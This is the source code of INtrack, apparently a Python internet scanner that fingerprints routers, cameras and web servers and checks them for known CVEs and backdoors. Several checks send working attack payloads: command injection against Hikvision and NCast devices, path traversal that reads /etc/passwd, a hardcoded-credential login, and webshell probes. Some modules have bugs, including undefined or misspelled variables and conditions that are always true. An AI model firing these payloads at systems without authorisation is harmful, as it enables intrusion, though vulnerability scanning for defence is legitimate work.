 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 | 
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             try:
16 |                 url = f"{protocol}://{ip}{port}"
17 |                 response = requests.get(url, verify=False, timeout=timeout, headers=headers)
18 |                 server = response.headers.get('Server', '')
19 |                 if "Apache" in server:
20 |                     print_colour(f"[+] {url} [{server}]")
21 |                     return True
22 |             except requests.RequestException:
23 |                 continue
24 |     return False
25 | 


--------------------------------------------------------------------------------
/intrack/lib/iot/gargoyle_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_gargoyle(ip, ports=None, timeout=5):
 6 |     protocols = ["http", "https"]
 7 |     if ports is None:
 8 |         ports = [80]
 9 |     else:
10 |         ports = [f":{port}" for port in ports]
11 | 
12 |     for port in ports:
13 |         for protocol in protocols:
14 |             url = f"{protocol}://{ip}:{port}"
15 |             headers = {
16 |                 'User-Agent': user_agents()
17 |             }
18 |             try:
19 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
20 |                 if matcher in response.text:
21 |                     print_colour(f"Gargoyle device detected: {url}")
22 |                     return True
23 |             except requests.RequestException:
24 |                 continue
25 |     return False


--------------------------------------------------------------------------------
/intrack/lib/iot/netgear_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def scan_netgear(ip, ports=False, timeout=5):
 6 |     protocols = ["http", "https"]
 7 |     if ports is None:
 8 |         ports = [80]
 9 |     else:
10 |         ports = [f":{port}" for port in ports]
11 | 
12 |     for protocol in protocols:
13 |         for port in ports:
14 |             url = f"{protocol}://{ip}{port}"
15 |             headers = {
16 |                 'User-Agent': user_agents()
17 |             }
18 |             try:
19 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
20 |                 if "NETGEAR" in response.text:
21 |                     print_colour(f"NETGEAR router found: {url}")
22 |                     return True
23 |             except requests.RequestException:
24 |                 continue
25 |     return False
26 | 


--------------------------------------------------------------------------------
/intrack/lib/exposures/security_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_security(ip, ports=None, timeout=5):
 6 | 	headers = {
 7 | 	'User-Agent': user_agents()
 8 | 	}
 9 | 	paths = ["/security.txt", "/.well-known/security.txt"]
10 | 	matcher = ["Contact:", "Expires:"]
11 | 	protocols = ["http", "https"]
12 | 	if ports is None:
13 | 		ports = [80]
14 | 	else:
15 | 		ports = [f":{port}" for port in ports]
16 | 
17 | 	for protocol in protocols:
18 | 		for port in ports:
19 | 			for path in paths:
20 | 				url = f"{protocol}://{ip}{port}{path}"
21 | 				try:
22 | 					response = requests.get(url, timeout=timeout, verify=False, headers=headers)
23 | 					if any(matchers in response.text for matchers in matcher):
24 | 						print_colour(f"[+] Security file found: {url}")
25 | 						return True
26 | 				except requests.RequestException:
27 | 					continue
28 | 	return False
29 | 


--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
 1 | [build-system]
 2 | requires = ["setuptools>=61.0", "wheel"]
 3 | build-backend = "setuptools.build_meta"
 4 | 
 5 | [project]
 6 | name = "intrack"
 7 | version = "0.1.0"
 8 | description = "INtrack - Internet Crawler & Security Scanner"
 9 | authors = [
10 |   { name = "K3ysTr0K3R", email = "contact@example.com" }
11 | ]
12 | readme = "README.md"
13 | license = "MIT"
14 | requires-python = ">=3.7"
15 | 
16 | dependencies = [
17 |     "alive_progress==3.1.5",
18 |     "mmh3==4.1.0",
19 |     "netaddr==0.8.0",
20 |     "paramiko==3.4.1",
21 |     "requests==2.32.3",
22 |     "rich==13.9.4",
23 |     "rich_click==1.6.1",
24 |     "urllib3==1.26.5"
25 | ]
26 | 
27 | [project.scripts]
28 | intrack = "intrack.main:main"
29 | 
30 | [tool.setuptools]
31 | include-package-data = true
32 | 
33 | [tool.setuptools.package-data]
34 | "intrack" = ["**/*.txt"]
35 | 
36 | [tool.setuptools.packages.find]
37 | where = ["."]
38 | include = ["intrack*"]
39 | 
40 | [tool.setuptools.package-dir]
41 | "" = "."
42 | 


--------------------------------------------------------------------------------
/intrack/lib/iot/gpon_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_gpon(ip, ports=None, timeout=5):
 6 |     matcher = "<title>GPON Home Gateway</title>"
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f"{port}" for port in ports]
12 |     
13 |     for port in ports:
14 |         for protocol in protocols:
15 |             url = f"{protocol}://{ip}:{port}"
16 |             headers = {
17 |                 'User-Agent': user_agents()
18 |             }
19 |             try:
20 |                 response = requests.get(url, headers=headers, timeout=10, verify=False)
21 |                 if matcher in response.text:
22 |                     print_colour(f"GPON router detected: {url}")
23 |                     return True
24 |             except requests.RequestException:
25 |                 continue
26 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/dahua/CVE_2017_7925.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2017_7925(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     path = "/current_config/passwd"
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             url = f"{protocol}://{ip}{port}{path}"
16 |             try:
17 |                 response = requests.get(url, verify=False, timeout=timeout, headers=headers)
18 |                 if "ugm" in response.text or "id:name:passwd" in response.text:
19 |                     print_colour(f"The target is vulnerable to CVE-2017-7925 : {url}")
20 |                     return True
21 |             except requests.RequestException:
22 |                 continue
23 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/microsoft/CVE_2015_1635.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.color_handler import print_colour
 3 | 
 4 | def check_CVE_2015_1635(ip, ports=None, timeout=5):
 5 |     headers = {"Range": "bytes=0-18446744073709551615"}
 6 |     matchers = ["HTTP Error 416", "The requested range is not satisfiable"]
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |        ports = [80]
10 |     else:
11 |        ports = [f":{port}" for port in ports]
12 |     for port in ports:
13 |         for protocol in protocols:
14 |             url = f"{protocol}://{ip}{port}"
15 |             try:
16 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
17 |                 if any(matcher in response.text for matcher in matchers) and response.status_code == 416:
18 |                     print_colour(f"The target is vulnerable to CVE-2015-1635 : {url}")
19 |                     return True
20 |             except requests.RequestException:
21 |                 continue
22 |     return False
23 | 


--------------------------------------------------------------------------------
/intrack/lib/backdoors/antsword_backdoor.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def antsword_backdoor(ip, ports=None, timeout=10):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 | 
13 |     for port in ports:
14 |         for protocol in protocols:
15 |             url = f"{protocol}://{ip}{port}/.antproxy.php"
16 |             try:
17 |                 data = 'ant=echo md5("antproxy.php");'
18 |                 response = requests.post(url, data=data, verify=False, timeout=timeout, headers=headers)
19 |                 if "951d11e51392117311602d0c25435d7f" in response.text:
20 |                     print_colour(f"[+] AntSword backdoor detected: {url}")
21 |                     return True
22 |             except requests.RequestException:
23 |                 continue
24 |     return False
25 | 


--------------------------------------------------------------------------------
/intrack/lib/network/telnet_scanner.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from intrack.lib.color_handler import print_colour
 3 | 
 4 | def scan_telnet(ip, ports):
 5 |     success = False
 6 |     if isinstance(ports, list):
 7 |         for port in ports:
 8 |             try:
 9 |                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 |                 s.settimeout(5)
11 |                 s.connect((ip, port))
12 |                 try:
13 |                     banner = s.recv(1024).decode('utf-8', errors='ignore')
14 |                     if banner.strip():
15 |                         print_colour(f"{ip}:{port} [Banner: {banner.strip()}]")
16 |                     else:
17 |                         print_colour(f"{ip}:{port} [No banner]")
18 |                 except socket.timeout:
19 |                     print_colour(f"{ip}:{port} [Connected, no response]")
20 |                 success = True
21 |             except (socket.timeout, socket.error):
22 |                 continue
23 |             finally:
24 |                 s.close()
25 |     return success


--------------------------------------------------------------------------------
/intrack/lib/instances/__init__.py:
--------------------------------------------------------------------------------
 1 | from .apache import check_apache
 2 | from .bigip_scanner import bigip
 3 | from .drupal import check_drupal
 4 | from .jira import check_jira
 5 | from .joomla import check_joomla
 6 | from .microsoft_exchange import *
 7 | from .microsoft_iis import check_microsoft_iis
 8 | from .moveit import check_moveit
 9 | from .ncast import check_ncast
10 | from .nginx import check_nginx
11 | from .php import php
12 | from .server_scanner import check_servers
13 | from .thinkphp import check_thinkphp
14 | from .webdav_scanner import check_webdav
15 | from .weblogic_scanner import check_weblogic
16 | from .webmin_scanner import scan_webmin
17 | from .wordpress_scanner import check_wordpress
18 | from .zimbra import check_zimbra
19 | 
20 | __all__ = [
21 |     "check_apache", "bigip", "check_drupal", "check_jira", "check_joomla", "check_microsoft_iis",
22 |     "check_moveit", "check_ncast", "check_nginx", "php", "check_servers", "check_thinkphp",
23 |     "check_webdav", "check_weblogic", "scan_webmin", "check_wordpress", "check_zimbra"
24 | ]
25 | 


--------------------------------------------------------------------------------
/intrack/lib/exposures/robots_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_robots(ip, ports=None, timeout=5):
 6 |     matchers = ["User-agent:", "Disallow:", "Allow:"]
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else: 
11 |         ports = [f":{port}" for port in ports]
12 |     
13 |     for port in ports:
14 |         for protocol in protocols:
15 |             try:
16 |                 headers = {
17 |                     'User-Agent': user_agents()
18 |                 }
19 |                 url = f"{protocol}://{ip}{port}/robots.txt"
20 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
21 |                 if any(matcher in response.text for matcher in matchers):
22 |                     print_colour(f"[+] Robots file found: {url}")
23 |                     return True
24 |             except requests.RequestException:
25 |                 continue
26 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/zabbix/CVE_2019_17382.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2019_17382(ip, ports=None, timeout=5):
 6 |     path = "/zabbix.php?action=dashboard.view&dashboardid=1"
 7 |     protocols = ["http", "https"]
 8 |     if ports is None:
 9 |         ports = [80]
10 |     else:
11 |         ports = [f":{port}" for port in ports]
12 |     for protocol in protocols:
13 |         for port in ports:
14 |             try:
15 |                 headers = {
16 |                     'User-Agent': user_agents()
17 |                 }
18 |                 url = f"{protocol}://{ip}{port}{path}"
19 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
20 |                 if "<title>Dashboard</title>" in response.text:
21 |                     print_colour(f"The target is vulnerable to CVE-2019-17382 : {url}")
22 |                     return True
23 |             except requests.RequestException:
24 |                 continue
25 |     return False


--------------------------------------------------------------------------------
/intrack/lib/instances/weblogic_scanner.py:
--------------------------------------------------------------------------------
 1 | import string
 2 | import random
 3 | import requests
 4 | from intrack.lib.headers.headers_handler import user_agents
 5 | from intrack.lib.color_handler import print_colour
 6 | 
 7 | def generate_string(length=8):
 8 |     return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
 9 | 
10 | def check_weblogic(ip, ports=None, timeout=5):
11 | 	headers = {
12 | 	"User-Agent": user_agents()
13 | 	}
14 | 	path = f"/{generate_string()}"
15 | 	matchers = ["From RFC 2068", "Error 404--Not Found"]
16 | 	protocols = ["http", "https"]
17 | 	if ports is None:
18 | 		ports = [80]
19 | 	else:
20 | 		ports = [f":{port}" for port in ports]
21 | 	for protocol in protocols:
22 | 		for port in ports:
23 | 			url = f"{protocol}://{ip}{port}{path}"
24 | 			try:
25 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
26 | 				if any(matcher in response.text for matcher in matchers):
27 | 					print_colour(f"[+] WebLogic detected: {url}")
28 | 					return True
29 | 			except requests.RequestException:
30 | 				continue
31 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/hikvision/CVE_2017_7921.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2017_7921(ip, ports=None, timeout=5):
 6 |     path = "/system/deviceInfo?auth=YWRtaW46MTEK"
 7 |     matcher = "<firmwareVersion>"
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             url = f"{protocol}://{ip}{port}{path}"
16 |             headers = {
17 |                 'User-Agent': user_agents()
18 |             }
19 |             try:
20 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
21 |                 if matcher in response.text:
22 |                     print_colour(f"[+] The target is vulnerable to CVE-2017-7921 : {url}")
23 |                     return True
24 |             except requests.RequestException:
25 |                 continue
26 |     return False
27 | 


--------------------------------------------------------------------------------
/intrack/lib/backdoors/mikrotik_backdoor.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def mikrotik_backdoor(ip, ports=None, timeout=10):
 6 |     if ports is None:
 7 |         ports = [8291, 8728, 8729]
 8 |     else:
 9 |         ports = ports
10 |     
11 |     for port in ports:
12 |         try:
13 |             # Test for CVE-2018-14847
14 |             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
15 |             sock.settimeout(timeout)
16 |             sock.connect((ip, port))
17 |             
18 |             test_packet = b'\x03\x00\x00\x00\x01\x00\x00\x00\x88\x22\x00\x00\x00\x01\x00\x00\x00'
19 |             sock.send(test_packet)
20 |             
21 |             response = sock.recv(1024)
22 |             if b'\x88\x22\x00\x00' in response:
23 |                 print_colour(f"[+] Mikrotik RouterOS backdoor detected: {ip}:{port}")
24 |                 return True
25 |             sock.close()
26 |         except (socket.error, socket.timeout):
27 |             continue
28 |     return False


--------------------------------------------------------------------------------
/intrack/lib/iot/routeros_scanner.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def mikrotik_router(ip, ports=None, timeout=5):
 7 | 	headers = {'User-Agent': user_agents()}
 8 | 	protocols = ["http", "https"]
 9 | 	if ports is None:
10 | 		ports = [80]
11 | 	else:
12 | 		ports = [f":{port}" for port in ports]
13 | 
14 | 	for protocol in protocols:
15 | 		for port in ports:
16 | 			url = f"{protocol}://{ip}{port}"
17 | 			try:
18 | 				response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 | 				version = re.findall(r"<h1>RouterOS v(.+)<\/h1>", response.text)
20 | 				if "RouterOS" or "<title>RouterOS router configuration page</title>" in response.text:
21 | 					if version:
22 | 						version_clean = version[0]
23 | 						print_colour(f"[+] {url} - RouterOS detected (MikroTik router) ({version_clean})")
24 | 					else:
25 | 						print_colour(f"[+] {url} - RouterOS detected (MikroTik router)")
26 | 					return True
27 | 			except requests.RequestException:
28 | 				continue
29 | 	return False


--------------------------------------------------------------------------------
/intrack/lib/instances/webmin_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def scan_webmin(ip, ports=None, timeout=5):
 6 |     protocols = ["http", "https"]
 7 |     if ports is None:
 8 |         ports = [80]
 9 |     else:
10 |         ports = [f":{port}" for port in ports]
11 | 
12 |     for protocol in protocols:
13 |         for port in ports:
14 |             url = f"{protocol}://{ip}{port}"
15 | 
16 |             headers = {
17 |                 'User-Agent': user_agents()
18 |             }
19 | 
20 |             try:
21 |                 response = requests.get(url, headers=headers, timeout=timeout, verify=False)
22 |                 server = response.headers.get('Server', '')
23 |                 if "Webmin" in response.text or "<title>Login to Webmin</title>" in response.text or server == "MiniServ":
24 |                     print_colour(f"Webmin detected: {url} [{server}]")
25 |                     return True
26 |             except requests.RequestException:
27 |                 continue
28 | 
29 |     return False
30 | 


--------------------------------------------------------------------------------
/intrack/lib/instances/moveit.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.color_handler import print_colour
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | 
 5 | def check_moveit(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     matchers = ["stylesheet_MOVEit", "moveit.transfer", "MOVEitPopUp", "MOVEit Automation"]
 8 |     path = ["", "/human.aspx"]
 9 |     protocols = ["http", "https"]
10 | 
11 |     if ports is None:
12 |         ports = [80]
13 |     else:
14 |         ports = [f":{port}" for port in ports]
15 |     
16 |     for protocol in protocols:
17 |         for port in ports:
18 |             for paths in path:
19 |                 try:
20 |                     url = f"{protocol}://{ip}{port}{paths}"
21 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
22 |                     if any(matcher in response.text for matcher in matchers):
23 |                         print_colour(f"[+] {url} - Moveit detected")
24 |                         return True
25 |                 except requests.RequestException:
26 |                     continue
27 |     return False


--------------------------------------------------------------------------------
/intrack/lib/backdoors/fatpipe_backdoor.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def fatpipe_backdoor(ip, ports=None, timeout=10):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 | 
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 | 
14 |     for port in ports:
15 |         for protocol in protocols:
16 |             url = f"{protocol}://{ip}{port}/fpui/loginServlet"
17 |             try:
18 |                 data = "loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D"
19 |                 response = requests.post(url, data=data, verify=False, timeout=timeout, headers=headers)
20 |                 if '"loginRes":"success"' in response.text and '"activeUserName":"cmuser"' in response.text:
21 |                     print_colour(f"[+] FatPipe backdoor detected: {url}")
22 |                     return True
23 |             except requests.RequestException:
24 |                 continue
25 |     return False
26 | 


--------------------------------------------------------------------------------
/intrack/lib/iot/cisco_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_cisco(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     paths = ["", "/Login.aspx", "/+CSCOE+/logon.html"]
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             for path in paths:
16 |                 url = f"{protocol}://{ip}{port}{path}"
17 |                 try:
18 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
19 |                     server = response.headers.get('Server', '')
20 |                     if 'config-auth client="vpn"' or "Cisco" in response.text or "CISCO" in server:
21 |                         print_colour(f"[+] Cisco device detected: {url}")
22 |                         return True
23 |                 except requests.RequestException:
24 |                     continue
25 |     return False


--------------------------------------------------------------------------------
/intrack/lib/iot/webcamxp_scanner.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | path = "/mobile.html"
 6 | matchers = ["webcams and ip cameras server for windows", "Please provide a valid username/password to access this server."]
 7 | 
 8 | def check_webcamxp(ip, ports=None, timeout=5):
 9 |     protocols = ["http", "https"]
10 |     if ports is None:
11 |         ports = [80]
12 |     else:
13 |         ports = [f":{port}" for port in ports]
14 | 
15 |     for protocol in protocols:
16 |         for port in ports:
17 |             url = f"{protocol}://{ip}{port}{path}"
18 |             headers = {
19 |                 'User-Agent': user_agents()
20 |             }
21 |             try:
22 |                 response = requests.get(url + path, headers=headers, timeout=timeout, verify=False)
23 |                 if any(matcher in response.text for matcher in matchers):
24 |                     print_colour(f"[+] WebcamXP detected: {url}")
25 |                     return True
26 |             except requests.RequestException:
27 |                 continue
28 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2019_2000.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2019_2000(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     paths = ["/prime/admin", "/webacs", "/webacs/welcomeAction.do"]
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [443, 8443]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |         
14 |     for protocol in protocols:
15 |         for port in ports:
16 |             for path in paths:
17 |                 url = f"{protocol}://{ip}{port}{path}"
18 |                 try:
19 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
20 |                     if "Cisco Prime Infrastructure" in response.text:
21 |                         print_colour(f"[+] Detected Cisco Prime Infrastructure, potentially vulnerable to CVE-2019-2000: {url}")
22 |                         return True
23 |                 except requests.RequestException:
24 |                     continue
25 |     return False 


--------------------------------------------------------------------------------
/intrack/lib/vulns/hikvision/CVE_2021_36260.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2021_36260(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     data = '''<?xml version="1.0" encoding="UTF-8"?><language>$(echo GSHWHJDjhwhdJHDWjwhdHikVissopndJHXBWGDAUWDGGGGGGGGGGGGGG>webLib/x)</language>'''
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |     for protocol in protocols:
14 |         for port in ports:
15 |             url = f"{protocol}://{ip}{port}/SDK/webLanguage"
16 |             try:
17 |                 response = requests.put(url, data=data, timeout=timeout, verify=False)
18 |                 if "GSHWHJDjhwhdJHDWjwhdHikVissopndJHXBWGDAUWDGGGGGGGGGGGGGG" in response.text:
19 |                     print_colour(f"[+] The target is vulnerable to CVE-2021-36260 : {url}")
20 |                     return True
21 |             except requests.RequestException:
22 |                 continue
23 |     return False
24 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2022_20842.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2022_20842(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     path = "/cgi-bin/cgiHandler.cgi"
 8 |     test_payload = "?action=../../../../../../../../bin/cat%20/etc/passwd"
 9 |     protocols = ["http", "https"]
10 |     if ports is None:
11 |         ports = [80, 443]
12 |     else:
13 |         ports = [f":{port}" for port in ports]
14 |         
15 |     for protocol in protocols:
16 |         for port in ports:
17 |             url = f"{protocol}://{ip}{port}{path}{test_payload}"
18 |             try:
19 |                 response = requests.get(url, verify=False, timeout=timeout, headers=headers)
20 |                 if response.status_code == 200 and ("root:" in response.text or "admin:" in response.text):
21 |                     print_colour(f"[+] Target is vulnerable to CVE-2022-20842 (Cisco IOS XE RCE): {url}")
22 |                     return True
23 |             except requests.RequestException:
24 |                 continue
25 |     return False 


--------------------------------------------------------------------------------
/intrack/lib/instances/drupal.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_drupal(ip, ports=None, timeout=5):
 6 |     headers = {
 7 |         "User-Agent": user_agents()
 8 |     }
 9 |     paths = ["", "/CHANGELOG.txt", "/core/install.php"]
10 |     matchers = ["Initial release", "Drupal 1.0.0", "Drupal"]
11 |     protocols = ["http", "https"]
12 |     if ports is None:
13 |         ports = [80]
14 |     else:
15 |         ports = [f":{port}" for port in ports]
16 | 
17 |     for protocol in protocols:
18 |         for path in paths:
19 |             for port in ports:
20 |                 url = f"{protocol}://{ip}{port}{path}"
21 |                 try:
22 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
23 |                     if response and response.text and any(matcher in response.text for matcher in matchers):
24 |                         print_colour(f"Drupal detected: {url}")
25 |                         return True
26 |                 except requests.RequestException:
27 |                     continue
28 |     return False
29 | 


--------------------------------------------------------------------------------
/intrack/lib/vulns/joomla/CVE_2023_23752.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.color_handler import print_colour
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | 
 5 | def check_CVE_2023_23752(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     protocols = ["http", "https"]
 8 |     paths = ['/api/index.php/v1/config/application?public=true', '/api/v1/config/application?public=true']
 9 |     matchers = ['"links":', '"attributes":']
10 | 
11 |     if ports is None:
12 |         ports = [80]
13 |     else:
14 |         ports = [f":{port}" for port in ports]
15 | 
16 |     for protocol in protocols:
17 |         for path in paths:
18 |             for port in ports:
19 |                 url = f"{protocol}://{ip}{port}{path}"
20 |                 try:
21 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
22 |                     if any(matcher in response.text for matcher in matchers):
23 |                         print_colour(f"The target is vulnerable to CVE-2023-23752 {url}")
24 |                         return True
25 |                 except requests.RequestException:
26 |                     continue
27 |     return False


--------------------------------------------------------------------------------
/intrack/lib/instances/joomla.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_joomla(ip, ports=None, timeout=5):
 7 |     headers = {"User-Agent": user_agents()}
 8 |     matchers = ["<version>", "<creationDate>", "</metafile>"]
 9 |     paths = ["/administrator/manifests/files/joomla.xml","/language/en-GB/en-GB.xml","/README.txt","/modules/custom.xml"]
10 |     protocols = ["http", "https"]
11 |     if ports is None:
12 |         ports = [80]
13 |     else:
14 |         ports = [f":{port}" for port in ports]
15 | 
16 |     for protocol in protocols:
17 |         for port in ports:
18 |             for path in paths:
19 |                 url = f"{protocol}://{ip}{port}{path}"
20 |                 try:
21 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
22 |                     if any(matcher in response.text for matcher in matchers):
23 |                         print_colour(f"Joomla instance detected: {url}")
24 |                         return True
25 |                 except requests.RequestException:
26 |                     continue
27 |     return False


--------------------------------------------------------------------------------
/intrack/lib/vulns/cisco/CVE_2021_1445.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from intrack.lib.headers.headers_handler import user_agents
 3 | from intrack.lib.color_handler import print_colour
 4 | 
 5 | def check_CVE_2021_1445(ip, ports=None, timeout=5):
 6 |     headers = {"User-Agent": user_agents()}
 7 |     paths = ["/api/sslvpn_websession", "/jboss-net/", "/dana-admin/"]
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [443]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 |         
14 |     for protocol in protocols:
15 |         for port in ports:
16 |             for path in paths:
17 |                 url = f"{protocol}://{ip}{port}{path}"
18 |                 try:
19 |                     response = requests.get(url, verify=False, timeout=timeout, headers=headers)
20 |                     if response.status_code == 200 and any(model in response.text for model in ["RV340", "RV345", "RV160", "RV260"]):
21 |                         print_colour(f"[+] Target may be vulnerable to CVE-2021-1445 (Cisco RV Authentication Bypass): {url}")
22 |                         return True
23 |                 except requests.RequestException:
24 |                     continue
25 |     return False 


--------------------------------------------------------------------------------
/intrack/lib/vulns/ncast/CVE_2024_0305.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | import requests
 3 | from intrack.lib.headers.headers_handler import user_agents
 4 | from intrack.lib.color_handler import print_colour
 5 | 
 6 | def check_CVE_2024_0305(ip, ports=None, timeout=5):
 7 |     headers = {"User-Agent": user_agents()}
 8 |     protocols = ["http", "https"]
 9 |     if ports is None:
10 |         ports = [80]
11 |     else:
12 |         ports = [f":{port}" for port in ports]
13 | 
14 |     for port in ports:
15 |         for protocol in protocols:
16 |             url = f"{protocol}://{ip}{port}/classes/common/busiFacade.php"
17 |             try:
18 |                 data = '''{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}'''
19 |                 response = requests.post(url, data=data, verify=False, headers=headers, timeout=timeout)
20 |                 id_result = re.findall(r"uid=([0-9a-z]+)\s+gid=([0-9a-z]+)", reponse.text)
21 |                 if id_result and "#str" in response.text:
22 |                     print_colour(f"The target is vulnerable to CVE-2024-0305 : {url}")
23 |                     return True
24 |             except requests.RequestException:
25 |                 continue
26 |     return False


